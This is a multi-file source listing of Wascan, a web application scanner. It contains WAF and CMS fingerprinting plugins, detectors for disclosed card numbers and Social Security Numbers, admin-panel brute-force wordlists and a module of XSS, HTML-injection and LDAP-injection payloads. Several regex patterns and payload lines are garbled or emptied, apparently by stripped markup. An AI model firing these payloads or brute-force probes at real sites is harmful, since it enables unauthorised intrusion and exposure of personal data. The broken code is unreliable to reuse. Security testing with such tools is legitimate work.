@repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def binarysec(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= header[0].lower() == "x-binarysec-via" 15 | _ |= header[0].lower() == "x-binarysec-nocache" 16 | _ |= search(r'binarySec',header[1],I) is not None 17 | if _: break 18 | if _ : 19 | return "BinarySEC Web Application Firewall (BinarySEC)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/isaserver.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def isaserver(headers,content): 12 | _ = False 13 | _ |= search(r'The server denied the specified Uniform Resource Locator (URL). 
Contact the server administrator.',content) is not None 14 | _ |= search(r'The ISA Server denied the specified Uniform Resource Locator (URL)',content) is not None 15 | if _ : 16 | return "ISA Server (Microsoft)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/modsecurity.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def modsecurity(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= search(r'Mod_Security|NOYB',header[1],I) is not None 15 | if _:break 16 | _ |= search(r'This error was generated by Mod_Security',content) is not None 17 | if _ : 18 | return "ModSecurity: Open Source Web Application Firewall (Trustwave)" -------------------------------------------------------------------------------- /plugins/fingerprint/waf/secureiis.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def secureiis(headers,content): 12 | _ = False 13 | _ |= search(r"SecureIIS[^<]+Web Server Protection",content) is not None 14 | _ |= search(r"http://www.eeye.com/SecureIIS/",content) is not None 15 | _ |= search(r"\?subject=[^>]*SecureIIS Error",content) is not None 16 | if _ : 17 | return "SecureIIS Web Server Security (BeyondTrust)" -------------------------------------------------------------------------------- /plugins/disclosure/creditcards.py: 
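--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# @name: Wascan - Web Application Scanner
# @repo: https://github.com/m4ll0k/Wascan
# @author: Momo Outaadi (M4ll0k)
# @license: See the file 'LICENSE.txt

from lib.utils.printer import *
from lib.parser.parse import *

def creditcards(content):
    """Report the card-like numbers that parse(content).getcc() extracts.

    Nothing is printed when the parser returns None or an empty list.
    """
    found = parse(content).getcc()
    # The original guard (`!= None or != []`) held for every value, so a None
    # result reached len() and raised TypeError.
    if not found:
        return
    # NOTE(review): the matches are printed in full, so any saved or shared
    # scan output then holds the card numbers itself; consider masking all but
    # the last four digits before reporting.
    if len(found) >= 2:
        # str(list) with the brackets cut off: the items as a quoted,
        # comma-separated run.
        plus('Credit card number disclosure: %s'%(str(found).split('[')[1].split(']')[0]))
    else:
        plus('Credit card number disclosure: %s'%found[0])
--------------------------------------------------------------------------------
/plugins/disclosure/privateip.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# @name: Wascan - Web Application Scanner
# @repo: https://github.com/m4ll0k/Wascan
# @author: Momo Outaadi (M4ll0k)
# @license: See the file 'LICENSE.txt

from lib.utils.printer import *
from lib.parser.parse import *

def privateip(content):
    """Report the private IP addresses that parse(content).getip() extracts.

    Nothing is printed when the parser returns None or an empty list.
    """
    found = parse(content).getip()
    # The original guard (`!= None or != []`) held for every value, so a None
    # result reached len() and raised TypeError.
    if not found:
        return
    if len(found) >= 2:
        plus('Private IP address disclosure: %s'%(str(found).split('[')[1].split(']')[0]))
    else:
        plus('Private IP address disclosure: %s'%found[0])
--------------------------------------------------------------------------------
/plugins/disclosure/ssn.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# @name: Wascan - Web Application Scanner
# @repo: https://github.com/m4ll0k/Wascan
# @author: Momo Outaadi (M4ll0k)
# @license: See the file 'LICENSE.txt

from lib.utils.printer import *
from lib.parser.parse import *

def ssn(content):
    """Report the US Social Security Numbers that parse(content).getssn() extracts.

    Nothing is printed when the parser returns None or an empty list.
    """
    found = parse(content).getssn()
    # The original guard (`!= None or != []`) held for every value, so a None
    # result reached len() and raised TypeError.
    if not found:
        return
    # NOTE(review): the matches are printed in full, so any saved or shared
    # scan output then holds the numbers itself; consider masking all but the
    # last four digits before reporting.
    if len(found) >= 2:
        plus('US Social Security Number disclosure: %s'%(str(found).split('[')[1].split(']')[0]))
    else:
        plus('US Social Security Number disclosure: %s'%found[0])
--------------------------------------------------------------------------------
/plugins/fingerprint/waf/bigip.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# @name: Wascan - Web Application Scanner
# @repo: https://github.com/m4ll0k/Wascan
# @author: Momo Outaadi (M4ll0k)
# @license: See the file 'LICENSE.txt

from re import search,I

def bigip(headers, content):
    """Return the BIG-IP label when a response header points to it.

    A header matches when its lower-cased name is "x-cnection" or "x-wa-info",
    or when its value matches the cookie/server pattern below
    (case-insensitive). `content` is not inspected. Returns None otherwise.
    """
    for name, value in headers.items():
        named = name.lower() in ("x-cnection", "x-wa-info")
        if named or search(r'\ATS\w{4,}=|bigip|bigipserver|\AF5\Z', value, I) is not None:
            return "BIG-IP Application Security Manager (F5 Networks)"
    return None
--------------------------------------------------------------------------------
/plugins/fingerprint/waf/sucuri.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# @name: Wascan - Web Application Scanner
# @repo: https://github.com/m4ll0k/Wascan
# @author: Momo Outaadi (M4ll0k)
# @license: See the file 'LICENSE.txt

from re import search,I

def sucuri(headers, content):
    """Return the Sucuri CloudProxy label from the block page or header values.

    The body is searched for two block-page markers; the header values are
    flattened with str() and searched case-insensitively for
    "sucuri/cloudproxy". Returns None when nothing matches.
    """
    body_patterns = (
        r"Questions\?.+cloudproxy@sucuri\.net",
        r"Sucuri WebSite Firewall - CloudProxy - Access Denied",
    )
    body_hit = any(search(pattern, content) is not None for pattern in body_patterns)
    header_hit = search('sucuri/cloudproxy', str(headers.values()), I) is not None
    if body_hit or header_hit:
        return "CloudProxy WebSite Firewall (Sucuri)"
    return None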
--------------------------------------------------------------------------------
/plugins/fingerprint/waf/requestvalidationmode.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# @name: Wascan - Web Application Scanner
# @repo: https://github.com/m4ll0k/Wascan
# @author: Momo Outaadi (M4ll0k)
# @license: See the file 'LICENSE.txt

from re import search,I

def requestvalidationmode(headers, content):
    """Return the ASP.NET RequestValidationMode label from its error text.

    `headers` is not inspected. Returns None when neither sentence is found
    in the body.
    """
    patterns = (
        r'ASP.NET has detected data in the request that is potentially dangerous',
        r'Request Validation has detected a potentially dangerous client input value',
    )
    if any(search(pattern, content) is not None for pattern in patterns):
        return "ASP.NET RequestValidationMode (Microsoft)"
    return None
--------------------------------------------------------------------------------
/plugins/fingerprint/waf/incapsula.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# @name: Wascan - Web Application Scanner
# @repo: https://github.com/m4ll0k/Wascan
# @author: Momo Outaadi (M4ll0k)
# @license: See the file 'LICENSE.txt

from re import search,I

def incapsula(headers, content):
    """Return the Incapsula label from a header value or the incident text.

    Header values are searched case-insensitively for the Incapsula cookie
    names or the word "incapsula"; the body is searched for "Incapsula
    incident ID". Returns None when nothing matches.
    """
    header_hit = any(
        search(r'incap_ses|visid_incap', value, I) is not None
        or search(r'incapsula', value, I) is not None
        for _name, value in headers.items()
    )
    body_hit = search(r'Incapsula incident ID', content) is not None
    if header_hit or body_hit:
        return "Incapsula Web Application Firewall (Incapsula/Imperva)"
    return None
--------------------------------------------------------------------------------
/plugins/fingerprint/waf/jiasule.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# @name: Wascan - Web Application Scanner
# @repo: https://github.com/m4ll0k/Wascan
# @author: Momo Outaadi (M4ll0k)
# @license: See the file 'LICENSE.txt

from re import search,I

def jiasule(headers, content):
    """Return the Jiasule label from a header value or its error-page script.

    Header values are searched case-insensitively for the Jiasule cookie
    names or "jiasule-waf"; the body is searched for the http_error.js URL.
    Returns None when nothing matches.
    """
    header_hit = any(
        search(r'__jsluid=|jsl_tracking', value, I) is not None
        or search(r'jiasule-waf', value, I) is not None
        for _name, value in headers.items()
    )
    body_hit = search(r'static\.jiasule\.com/static/js/http_error\.js', content) is not None
    if header_hit or body_hit:
        return "Jiasule Web Application Firewall (Jiasule)"
    return None
--------------------------------------------------------------------------------
/plugins/fingerprint/waf/cloudflare.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# @name: Wascan - Web Application Scanner
# @repo: https://github.com/m4ll0k/Wascan
# @author: Momo Outaadi (M4ll0k)
# @license: See the file 'LICENSE.txt

from re import search,I

def cloudflare(headers, content):
    """Return the CloudFlare label from the headers or the block page text.

    A header matches when its lower-cased name is "cf-ray" or its value
    matches the cookie/server pattern (case-insensitive); the body is
    searched for the Ray ID text or the CloudFlare script variable.
    Returns None when nothing matches.
    """
    header_hit = any(
        name.lower() == "cf-ray"
        or search(r'__cfduid=|cloudflare-nginx|cloudflare[-]', value, I) is not None
        for name, value in headers.items()
    )
    body_hit = search(r"CloudFlare Ray ID:|var CloudFlare=", content) is not None
    if header_hit or body_hit:
        return "CloudFlare Web Application Firewall (CloudFlare)"
    return None
--------------------------------------------------------------------------------
/lib/handler/crawler.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# @name: Wascan - Web Application Scanner
# @repo: https://github.com/m4ll0k/Wascan
# @author: Momo Outaadi (M4ll0k)
# @license: See the file 'LICENSE.txt

from lib.utils.printer import info
from lib.request.crawler import SCrawler

class Crawler:
    """Collect the links SCrawler reports, starting from one URL."""
    def run(self, kwargs, url, data):
        """Return the start URL followed by every distinct link found."""
        info("Starting crawler...")
        links = [url]
        # The list grows while it is walked, so each newly added link causes
        # one more pass.
        # NOTE(review): every pass hands SCrawler the start `url`, never
        # `link`, so the same page is requested once per collected link;
        # presumably `link` was intended - confirm. If the loop is changed to
        # follow `link`, add a same-host scope check and a page or depth cap so
        # a scan stays inside the authorised target.
        for link in links:
            for found in SCrawler(kwargs, url, data).run():
                if found not in links:
                    links.append(found)
        return links

--------------------------------------------------------------------------------
/lib/utils/exception.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# @name: Wascan - Web Application Scanner
# @repo: https://github.com/m4ll0k/Wascan
# @author: Momo Outaadi (M4ll0k)
# @license: See the file 'LICENSE.txt'

from urllib2 import HTTPError

class WascanUnboundLocalError(UnboundLocalError):
    """Wascan's own subclass of UnboundLocalError."""

class WascanDataException(Exception):
    """Wascan exception type; adds nothing to Exception."""

class WascanNoneException(Exception):
    """Wascan exception type; adds nothing to Exception."""

class WascanInputException(Exception):
    """Wascan exception type; adds nothing to Exception."""

class WascanGenericException(Exception):
    """Wascan exception type; adds nothing to Exception."""

class WascanConnectionException(HTTPError):
    """Wascan's own subclass of urllib2.HTTPError."""

class WascanKeyboardInterrupt(KeyboardInterrupt):
    """Wascan's own subclass of KeyboardInterrupt."""
--------------------------------------------------------------------------------
/plugins/fingerprint/framework/seagull.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# @name: Wascan - Web Application Scanner
# @repo: https://github.com/m4ll0k/Wascan
# @author: Momo Outaadi (M4ll0k)
# @license: See the file 'LICENSE.txt

from re import search,I

def seagull(headers,content):
    # NOTE(review): the first two patterns look as if markup was stripped from
    # them in this listing (the first is empty, which matches any body). They
    # are reproduced exactly as shown; check the repository for the real text.
    _ = False
    _ |= search(r"",content) is not None
    _ |= search(r"Powered by \Seagull PHP Framework<\/a\>",content) is not None
    _ |= search(r"var SGL_JS_SESSID[\s]*=",content) is not None
    if _: return "Seagull - PHP Framework"
--------------------------------------------------------------------------------
/plugins/fingerprint/cms/wordpress.py:
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' 8 | 9 | from re import search,I 10 | 11 | def wordpress(headers,content): 12 | _ = False 13 | _ |= search(r"\",content) is not None 14 | _ |= search(r"\Powered by WordPress\<\/a\>",content) is not None 15 | _ |= search(r"\\Welcome to Django\<\/title\>",content) is not None 19 | if _ : return "Django - Python Framework" -------------------------------------------------------------------------------- /lib/handler/audit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from plugins.audit.xst import * 10 | from plugins.audit.apache import * 11 | from plugins.audit.dav import * 12 | from plugins.audit.phpinfo import * 13 | from plugins.audit.robots import * 14 | from lib.utils.printer import * 15 | 16 | 17 | def Audit(kwargs, url, data): 18 | info("Starting audit module...") 19 | xst(kwargs, url, data).run() 20 | apache(kwargs, url, data).run() 21 | # dav(kwargs, url, data).run() 22 | phpinfo(kwargs, url, data).run() 23 | robots(kwargs, url, data).run() 24 | null() 25 | -------------------------------------------------------------------------------- /plugins/fingerprint/server/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 
9 | from lib.request.request import * 10 | from lib.utils.rand import * 11 | 12 | class server(Request): 13 | def __init__(self,kwargs,url): 14 | Request.__init__(self,kwargs) 15 | self.url = url 16 | 17 | def run(self): 18 | server = "" 19 | try: 20 | resp = self.Send(url=self.url,method="GET",headers={r_string(5) : r_string(10)}) 21 | for item in resp.headers.items(): 22 | if item[0].lower() == "server": 23 | server += item[1] 24 | break 25 | return server 26 | except Exception,e: 27 | pass -------------------------------------------------------------------------------- /plugins/fingerprint/framework/asp_mvc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def mvc(headers,content): 12 | _ = False 13 | for header in headers.items(): 14 | _ |= header[0] == "x-aspnetmvc-version" 15 | _ |= header[0] == "x-aspnet-version" 16 | _ |= search(r"asp.net|anonymousID=|chkvalues=|__requestverificationtoken",header[1]) is not None 17 | if _ : break 18 | _ |= search(r"Web Settings for Active Server Pages",content) is not None 19 | _ |= search(r"name=\"__VIEWSTATEENCRYPTED\" id=\"__VIEWSTATEENCRYPTED\"",content) is not None 20 | if _ : return "ASP.NET Framework" -------------------------------------------------------------------------------- /plugins/fingerprint/framework/zend.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from re import search,I 10 | 11 | def zend(headers,content): 12 | _ = False 13 | for 
header in headers.items(): 14 | _ |= search("zend",header[1]) is not None 15 | if _ : break 16 | _ |= search(r"\",content) is not None 20 | if _ : return "Zend - PHP Framework" -------------------------------------------------------------------------------- /lib/handler/brute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from plugins.brute.adminpanel import * 10 | from plugins.brute.backdoor import * 11 | from plugins.brute.backupdir import * 12 | from plugins.brute.backupfile import * 13 | from plugins.brute.commondir import * 14 | from plugins.brute.commonfile import * 15 | 16 | 17 | def Brute(kwargs, url, data): 18 | info("Starting brute module...") 19 | backdoor(kwargs, url, data).run() 20 | backupdir(kwargs, url, data).run() 21 | backupfile(kwargs, url, data).run() 22 | commonfile(kwargs, url, data).run() 23 | commondir(kwargs, url, data).run() 24 | adminpanel(kwargs, url, data).run() 25 | null() 26 | -------------------------------------------------------------------------------- /lib/db/errors/xpath.json: -------------------------------------------------------------------------------- 1 | {"info":{"name":"XPath","regexp":["::xpath()","XPATH syntax error\\:","XPathException","XPath\\:","XPath\\(\\)","System.Xml.XPath.XPathException\\:","MS\\.Internal\\.Xml\\.","Unknown error in XPath","org.apache.xpath.XPath","A closing bracket expected in","An operand in Union Expression does not produce a node-set","Cannot convert expression to a number","Document Axis does not allow any context Location Steps","Empty Path Expression","Empty Relative Location Path","Empty Union Expression","Expected \\'\\)\\' in","Expected node test or name specification after axis operator","Incompatible XPath 
key","Incorrect Variable Binding","libxml2 library function failed","xmlsec library function","error \\'80004005\\'","A document must contain exactly one root element\\.","Expected token \\']\\'","\\msxml4.dll\\<\\/font\\>","4005 Notes error: Query is not understandable"]}} -------------------------------------------------------------------------------- /plugins/fingerprint/cms/silverstripe.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt' 8 | 9 | from re import search,I 10 | 11 | def silverstripe(headers,content): 12 | _ = False 13 | if 'set-cookie' in headers.keys(): 14 | _ |= search(r"PastVisitor=[0-9]+.*",headers["set-cookie"],I) is not None 15 | _ |= search(r"\]*content\=\"SilverStripe",content) is not None 16 | _ |= search(r"\]*stylesheet[^>]*layout.css[^>]*\>[^<]*\]*stylesheet[^>]*typography.css[^>]*\>[^<]*\]*stylesheet[^>]*form.css[^>]*\>",content) is not None 17 | _ |= search(r"\",content) is not None 16 | _ |= search(r"\",content) is not None 17 | _ |= search(r"Powered by \Joomla!\<\/a\>.",content) is not None 18 | if _ : return "Joomla" -------------------------------------------------------------------------------- /lib/db/adminpanel.wascan: -------------------------------------------------------------------------------- 1 | admin 2 | admin.asp 3 | admin.aspx 4 | admin.cfm 5 | admin.cgi 6 | admin.do 7 | admin.htm 8 | admin.py 9 | sadmin 10 | cmsadmin 11 | admin.db 12 | admin.ctp 13 | admin.ini 14 | admin.tpl 15 | admin.xml 16 | admin.html 17 | admin.jsp 18 | admin.php 19 | admin.php3 20 | admin2 21 | admin_ 22 | admin_login 23 | admin_logon 24 | administracion 25 | administrador 26 | administrateur 27 | administration 28 | administrator 29 | amministratore 30 | administrator 31 | adminlogon 
32 | authadmin 33 | backend 34 | console 35 | fpadmin 36 | iisadmin 37 | manage 38 | manager 39 | phpmyadmin 40 | portal 41 | siteadmin 42 | staff 43 | user 44 | users 45 | usuario 46 | usuarios 47 | webadmin 48 | wp-admin 49 | wp-login.php 50 | ~admin 51 | _admin 52 | admin2.php 53 | admin.html 54 | admins.php 55 | admin.php3 56 | admin.aspx 57 | _admin.php 58 | admin1.php 59 | admin.thtml 60 | admin.rhtml 61 | xgadmin.asp 62 | pnadmin.php -------------------------------------------------------------------------------- /lib/handler/disclosure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | 10 | from plugins.disclosure.creditcards import * 11 | from plugins.disclosure.emails import * 12 | from plugins.disclosure.privateip import * 13 | from plugins.disclosure.ssn import * 14 | from lib.request.request import * 15 | from plugins.disclosure.errors import * 16 | from lib.utils.printer import * 17 | 18 | class Disclosure(Request): 19 | """ Disclosure """ 20 | def __init__(self,kwargs,url,data): 21 | Request.__init__(self,kwargs) 22 | self.url = url 23 | 24 | def run(self): 25 | info('Starting disclosure module...') 26 | req = self.Send(url=self.url,method="GET") 27 | creditcards(req.content) 28 | emails(req.content) 29 | privateip(req.content) 30 | ssn(req.content) 31 | errors(req.content,req.url) 32 | null() -------------------------------------------------------------------------------- /plugins/fingerprint/cms/drupal.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # 
@license: See the file 'LICENSE.txt' 8 | 9 | from re import search,I 10 | 11 | def drupal(headers,content): 12 | _ = False 13 | if 'set-cookie' in headers.keys(): 14 | _ |= search(r"SESS[a-z0-9]{32}=[a-z0-9]{32}",headers["set-cookie"],I) is not None 15 | if 'x-drupal-cache' in headers.keys():_ |= True 16 | _ |= search(r"\"] 23 | payload += [r""] 24 | payload += [r"\'\';!--\"<"+r_string(5)+r">=&{()}"] 25 | payload += [r""] 30 | payload += [r""] 31 | payload += [r"alert\`"+r_string(5)+r"\`"] 32 | payload += [r">

%s

"%(r_string(20))] 159 | payload += ["

%s

"%(r_string(20))] 160 | payload += ["

Login

"%(r_string(30))] 161 | return payload 162 | 163 | def ldap(): 164 | """ LDAP Injection """ 165 | payload = ["!"] 166 | payload += ["%29"] 167 | payload += ["%21"] 168 | payload += ["%28"] 169 | payload += ["%26"] 170 | payload += ["("] 171 | payload += [")"] 172 | payload += ["@\'"] 173 | payload += ["*()|&'"] 174 | payload += ["%s*"%r_string(10)] 175 | payload += ["*(|(%s=*))"%r_string(10)] 176 | payload += ["%s*)((|%s=*)"%(r_string(10),r_string(10))] 177 | payload += [r"%2A%28%7C%28"+r_string(10)+r"%3D%2A%29%29"] 178 | return payload 179 | -------------------------------------------------------------------------------- /lib/handler/fingerprint.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | # 4 | # @name: Wascan - Web Application Scanner 5 | # @repo: https://github.com/m4ll0k/Wascan 6 | # @author: Momo Outaadi (M4ll0k) 7 | # @license: See the file 'LICENSE.txt 8 | 9 | from lib.utils.printer import * 10 | from lib.request.request import * 11 | from plugins.fingerprint.cms.drupal import * 12 | from plugins.fingerprint.cms.joomla import * 13 | from plugins.fingerprint.cms.magento import * 14 | from plugins.fingerprint.cms.plone import * 15 | from plugins.fingerprint.cms.silverstripe import * 16 | from plugins.fingerprint.cms.wordpress import * 17 | from plugins.fingerprint.framework.asp_mvc import * 18 | from plugins.fingerprint.framework.cakephp import * 19 | from plugins.fingerprint.framework.codeigniter import * 20 | from plugins.fingerprint.framework.cherrypy import * 21 | from plugins.fingerprint.framework.dancer import * 22 | from plugins.fingerprint.framework.django import * 23 | from plugins.fingerprint.framework.flask import * 24 | from plugins.fingerprint.framework.fuelphp import * 25 | from plugins.fingerprint.framework.grails import * 26 | from plugins.fingerprint.framework.horde import * 27 | from plugins.fingerprint.framework.karrigell import * 28 | from 
plugins.fingerprint.framework.larvel import * 29 | from plugins.fingerprint.framework.nette import * 30 | from plugins.fingerprint.framework.phalcon import * 31 | from plugins.fingerprint.framework.play import * 32 | from plugins.fingerprint.framework.rails import * 33 | from plugins.fingerprint.framework.seagull import * 34 | from plugins.fingerprint.framework.spring import * 35 | from plugins.fingerprint.framework.symfony import * 36 | from plugins.fingerprint.framework.web2py import * 37 | from plugins.fingerprint.framework.yii import * 38 | from plugins.fingerprint.framework.zend import * 39 | from plugins.fingerprint.header.cookies import * 40 | from plugins.fingerprint.header.header import * 41 | from plugins.fingerprint.language.asp import * 42 | from plugins.fingerprint.language.aspnet import * 43 | from plugins.fingerprint.language.coldfusion import * 44 | from plugins.fingerprint.language.flash import * 45 | from plugins.fingerprint.language.java import * 46 | from plugins.fingerprint.language.perl import * 47 | from plugins.fingerprint.language.php import * 48 | from plugins.fingerprint.language.python import * 49 | from plugins.fingerprint.language.ruby import * 50 | from plugins.fingerprint.os.bsd import * 51 | from plugins.fingerprint.os.ibm import * 52 | from plugins.fingerprint.os.linux import * 53 | from plugins.fingerprint.os.mac import * 54 | from plugins.fingerprint.os.solaris import * 55 | from plugins.fingerprint.os.unix import * 56 | from plugins.fingerprint.os.windows import * 57 | from plugins.fingerprint.server.server import * 58 | from plugins.fingerprint.waf.airlock import * 59 | from plugins.fingerprint.waf.anquanbao import * 60 | from plugins.fingerprint.waf.armor import * 61 | from plugins.fingerprint.waf.aws import * 62 | from plugins.fingerprint.waf.asm import * 63 | from plugins.fingerprint.waf.baidu import * 64 | from plugins.fingerprint.waf.barracuda import * 65 | from plugins.fingerprint.waf.betterwpsecurity import * 66 | from 
plugins.fingerprint.waf.bigip import * 67 | from plugins.fingerprint.waf.binarysec import * 68 | from plugins.fingerprint.waf.blockdos import * 69 | from plugins.fingerprint.waf.ciscoacexml import * 70 | from plugins.fingerprint.waf.cloudflare import * 71 | from plugins.fingerprint.waf.cloudfront import * 72 | from plugins.fingerprint.waf.comodo import * 73 | from plugins.fingerprint.waf.datapower import * 74 | from plugins.fingerprint.waf.denyall import * 75 | from plugins.fingerprint.waf.dotdefender import * 76 | from plugins.fingerprint.waf.edgecast import * 77 | from plugins.fingerprint.waf.expressionengine import * 78 | from plugins.fingerprint.waf.fortiweb import * 79 | from plugins.fingerprint.waf.hyperguard import * 80 | from plugins.fingerprint.waf.incapsula import * 81 | from plugins.fingerprint.waf.isaserver import * 82 | from plugins.fingerprint.waf.jiasule import * 83 | from plugins.fingerprint.waf.knownsec import * 84 | from plugins.fingerprint.waf.kona import * 85 | from plugins.fingerprint.waf.modsecurity import * 86 | from plugins.fingerprint.waf.netcontinuum import * 87 | from plugins.fingerprint.waf.netscaler import * 88 | from plugins.fingerprint.waf.newdefend import * 89 | from plugins.fingerprint.waf.nsfocus import * 90 | from plugins.fingerprint.waf.paloalto import * 91 | from plugins.fingerprint.waf.profense import * 92 | from plugins.fingerprint.waf.radware import * 93 | from plugins.fingerprint.waf.requestvalidationmode import * 94 | from plugins.fingerprint.waf.safe3 import * 95 | from plugins.fingerprint.waf.safedog import * 96 | from plugins.fingerprint.waf.secureiis import * 97 | from plugins.fingerprint.waf.senginx import * 98 | from plugins.fingerprint.waf.sitelock import * 99 | from plugins.fingerprint.waf.sonicwall import * 100 | from plugins.fingerprint.waf.sophos import * 101 | from plugins.fingerprint.waf.stingray import * 102 | from plugins.fingerprint.waf.sucuri import * 103 | from plugins.fingerprint.waf.teros import * 104 | 
from plugins.fingerprint.waf.trafficshield import *
from plugins.fingerprint.waf.urlscan import *
from plugins.fingerprint.waf.uspses import *
from plugins.fingerprint.waf.varnish import *
from plugins.fingerprint.waf.wallarm import *
from plugins.fingerprint.waf.webknight import *
from plugins.fingerprint.waf.yundun import *
from plugins.fingerprint.waf.yunsuo import *


class Fingerprint(Request):
    """Report what a single GET response reveals about the target's stack.

    The ``detect*`` helpers in this module receive only the headers and/or
    body of that one response, so every finding is an inference from data
    the server chose to send. Each printed line is therefore also a list
    entry for whoever hardens the server: it names something the response
    currently discloses.
    """

    def __init__(self,kwargs,url):
        Request.__init__(self,kwargs)
        self.kwarg = kwargs
        self.url = url

    def run(self):
        """Fetch ``self.url`` once and print every non-empty detector result.

        Stages run in a fixed order: server banner, CMS, framework,
        language, operating system, WAF, then the header/cookie checks.
        The whole sequence sits inside one ``try``; the first exception
        raised by any stage is printed and the remaining stages are
        skipped, so a short report does not by itself mean that nothing
        else was detectable.
        """
        info('Starting fingerprint target...')
        try:
            resp = self.Send(url=self.url,method="GET")
            banner = server(self.kwarg,self.url).run()
            if banner:
                plus('Server: %s'%(banner))
            # (output template, detector call) pairs. The calls are wrapped
            # in lambdas so that each stage's findings are printed before
            # the next stage's detectors run.
            stages = (
                ('CMS: %s', lambda: detectCms(resp.headers,resp.content)),
                ('Framework: %s', lambda: detectFramework(resp.headers,resp.content)),
                ('Language: %s', lambda: detectLanguage(resp.content)),
                ('Operating System: %s', lambda: detectOs(resp.headers)),
                ('Web Application Firewall (WAF): %s', lambda: detectWaf(resp.headers,resp.content)),
            )
            for template, detect in stages:
                for finding in detect():
                    # Detectors that found nothing yield None or "".
                    if finding != None and finding != "":
                        plus(template%(finding))
            checkHeaders(resp.headers,resp.content)
            null()
        except Exception as e:
            print("Exception: {}".format(e))


def detectCms(headers,content):
    """Run every CMS detector on one response.

    Returns a tuple with one entry per detector, in the order listed.
    ``Fingerprint.run`` ignores entries that are ``None`` or ``""``.
    """
    detectors = (drupal, joomla, magento, plone, silverstripe, wordpress)
    return tuple(probe(headers,content) for probe in detectors)


def detectFramework(headers,content):
    """Run every web-framework detector on one response.

